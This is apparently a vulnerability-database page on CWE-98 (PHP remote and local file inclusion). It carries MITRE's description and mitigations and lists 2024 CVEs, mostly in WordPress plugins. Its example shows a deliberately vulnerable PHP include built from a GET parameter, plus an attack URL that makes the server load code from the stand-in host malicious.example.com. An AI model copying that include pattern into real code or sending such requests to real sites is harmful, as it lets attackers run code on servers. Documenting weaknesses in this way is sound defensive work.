Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CWE-98 (PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含)) — Vulnerability Class 1083

1083 vulnerabilities classified as CWE-98 (PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含)). AI Chinese analysis included.

CWE-98 represents a critical input validation weakness where PHP applications fail to properly sanitize user-supplied data before passing it to include or require functions. Attackers typically exploit this by injecting malicious URLs or local file paths, enabling Remote File Inclusion (RFI) or Local File Inclusion (LFI). This allows adversaries to execute arbitrary code hosted on external servers or access sensitive system files, often leading to full server compromise. To mitigate this risk, developers must strictly validate and whitelist allowed filenames or paths, ensuring only expected local resources are included. Additionally, disabling the allow_url_include and allow_url_fopen directives in the PHP configuration prevents the inclusion of remote files entirely. Implementing robust input validation and adhering to the principle of least privilege significantly reduces the attack surface associated with dynamic file inclusion mechanisms.

MITRE CWE Description
The PHP application receives input from an upstream component, but it does not restrict or incorrectly restricts the input before its usage in "require," "include," or similar functions. In certain versions and configurations of PHP, this can allow an attacker to specify a URL to a remote location from which the product will obtain the code to execute. In other cases in association with path traversal, the attacker can specify a local file that may contain executable statements that can be parsed by PHP.
Common Consequences (1)
Integrity, Confidentiality, AvailabilityExecute Unauthorized Code or Commands
The attacker may be able to specify arbitrary code to be executed from a remote location. Alternatively, it may be possible to use normal program behavior to insert php code into files on the local machine which can then be included and force the code to execute since php ignores everything in the f…
Mitigations (5)
Architecture and DesignUse a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid [REF-1482].
Architecture and DesignWhen the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. For example, ID 1 could map to "inbox.txt" and ID 2 could map to "profile.txt". Features such as the ESAPI AccessReferenceMap [REF-185] provide this capability.
Architecture and DesignFor any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Architecture and Design, OperationRun the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For ex…
Effectiveness: Limited
Architecture and Design, OperationRun your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database ad…
Examples (1)
The following code, victim.php, attempts to include a function contained in a separate PHP page on the server. It builds the path to the file by using the supplied 'module_name' parameter and appending the string '/function.php' to it.
$dir = $_GET['module_name']; include($dir . "/function.php");
Bad · PHP
victim.php?module_name=http://malicious.example.com
Attack
CVE IDTitleCVSSSeverityPublished
CVE-2024-37410 WordPress PowerPack Lite for Beaver Builder plugin <= 1.3.0.3 - Local File Inclusion vulnerability — PowerPack Lite for Beaver Builder 4.9 Medium2024-07-09
CVE-2024-5431 WPCafe – Online Food Ordering, Restaurant Menu, Delivery, and Reservations for WooCommerce <= 2.2.25 - Authenticated (Contributor+) File inclusion via Shortcode — WPCafe – Restaurant Menu, Online Food Ordering & Table Booking System 8.8 High2024-06-25
CVE-2024-5455 The Plus Addons for Elementor – Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce <= 5.5.6 - Authenticated (Contributor+) Local File Inclusion — The Plus Addons for Elementor Page Builder Pro 8.8 High2024-06-21
CVE-2024-5503 WP Blog Post Layouts <= 1.1.3 - Authenticated (Contributor+) Local File Inlcusion — WP Blog Post Layouts 8.8 High2024-06-21
CVE-2024-5574 WP Magazine Modules Lite <= 1.1.2 - Authenticated (Contributor+) Local File Inclusion — WP Magazine Modules Lite 7.5 High2024-06-19
CVE-2024-4551 Video Gallery – YouTube Playlist, Channel Gallery by YotuWP <= 1.3.13 - Authenticated (Contributor+) Arbitrary File Inclusion via Shortcode — Video Gallery – YouTube Playlist, Channel Gallery by YotuWP 6.4 Medium2024-06-15
CVE-2024-4258 Video Gallery – YouTube Playlist, Channel Gallery by YotuWP <= 1.3.13 - Unauthenticated Local File Inclusion — Video Gallery – YouTube Playlist, Channel Gallery by YotuWP 9.8 Critical2024-06-15
CVE-2024-3813 tagDiv Composer <= 4.8 - Authenticated (Contributor+) Local File Inclusion via Shortcode — tagDiv Composer 8.8 High2024-06-15
CVE-2024-5577 Where I Was, Where I Will Be <= 1.1.1 - Unauthenticated Remote File Inclusion — Where I Was, Where I Will Be 9.8 Critical2024-06-14
CVE-2024-4936 Canto <= 3.0.8 - Unauthenticated Remote File Inclusion — Canto 9.8 Critical2024-06-14
CVE-2024-36415 SuiteCRM Improper Control of Filename for Include Statement in PHP and Unrestricted Upload of File with Dangerous content leads to authenticated remote code execution — SuiteCRM 9.1 Critical2024-06-10
CVE-2024-35650 WordPress MelaPress Login Security plugin <= 1.3.0 - Remote File Inclusion vulnerability — MelaPress Login Security 4.9 Medium2024-06-10
CVE-2024-4887 Qi Addons For Elementor <= 1.7.2 - Authenticated (Contributor+) Local File Inclusion — Qi Addons For Elementor 7.5 High2024-06-07
CVE-2024-35629 WordPress Easy Digital Downloads – Recent Purchases plugin <= 1.0.2 - Remote File Inclusion vulnerability — Easy Digital Downloads – Recent Purchases 9.6 Critical2024-06-04
CVE-2024-5348 Elements For Elementor <= 2.1 - Authenticated (Contributor+) Local File Inclusion via Multiple Widget Attributes — Elements For Elementor 8.8 High2024-06-01
CVE-2024-3564 Content Blocks (Custom Post Widget) <= 3.3.0 - Authenticated (Contributor+) Local File Inclusion via Shortcode — Content Blocks (Custom Post Widget) 8.8 High2024-06-01
CVE-2024-5345 Responsive Owl Carousel for Elementor <= 1.2.0 - Local File Inclusion — Responsive Owl Carousel for Elementor 8.8 High2024-05-31
CVE-2024-3812 Salient Core <= 2.0.7 - Authenticated (Contributor+) Local File Inclusion via Shortcode — Salient Core 7.5 High2024-05-18
CVE-2024-3810 Salient Shortcodes <= 1.5.3 - Authenticated (Contributor+) Local File Inclusion via Shortcode — Salient Shortcodes 8.8 High2024-05-18
CVE-2024-32523 WordPress Mailster plugin <= 4.0.6 - Unauthenticated Local File Inclusion vulnerability — Mailster 8.1 High2024-05-17
CVE-2024-27971 WordPress Premmerce Permalink Manager for WooCommerce plugin <= 2.3.10 - Local File Inclusion vulnerability — Premmerce Permalink Manager for WooCommerce 8.3 High2024-05-17
CVE-2024-3551 Penci Soledad Data Migrator <= 1.3.0 - Unauthenticated Local File Inclusion — Penci Soledad Data Migrator 9.8 Critical2024-05-17
CVE-2024-4670 All-in-One Video Gallery <= 3.6.5 - Authenticated (Contributor+) Local File Inclusion via aiovg_search_form Shortcode — All-in-One Video Gallery 8.8 High2024-05-15
CVE-2024-31459 Cacti RCE vulnerability by file include in lib/plugin.php — cacti 8.1 High2024-05-13
CVE-2024-3808 Porto Theme - Functionality <= 3.1.0 - Authenticated (Contributor+) Local File Inclusion via Shortcode — Porto Theme - Functionality 8.8 High2024-05-09
CVE-2024-3809 Porto Theme - Functionality <= 3.0.9 - Authenticated (Contributor+) Local File Inclusion via Post Meta — Porto Theme - Functionality 8.8 High2024-05-09
CVE-2024-3806 Porto <= 7.1.0 - Unauthenticated Local File Inclusion via porto_ajax_posts — Porto 9.8 Critical2024-05-09
CVE-2024-4441 XML Sitemap & Google News <= 5.4.8 - Unauthenticated Local File Inclusion — XML Sitemap & Google News 8.1 High2024-05-09
CVE-2024-3807 Porto <= 7.1.0 - Authenticated (Contributor+) Local File Inclusion via Post Meta — Porto 8.8 High2024-05-09
CVE-2024-3849 Click to Chat – HoliThemes <= 3.35 - Authenticated (Contributor+) Local File Inclusion — Click to Chat – HoliThemes 8.8 High2024-05-02

Vulnerabilities classified as CWE-98 (PHP程序中Include/Require语句包含文件控制不恰当(PHP远程文件包含)) represent 1083 CVEs. The CWE taxonomy describes the weakness; review individual CVEs for product-specific impact.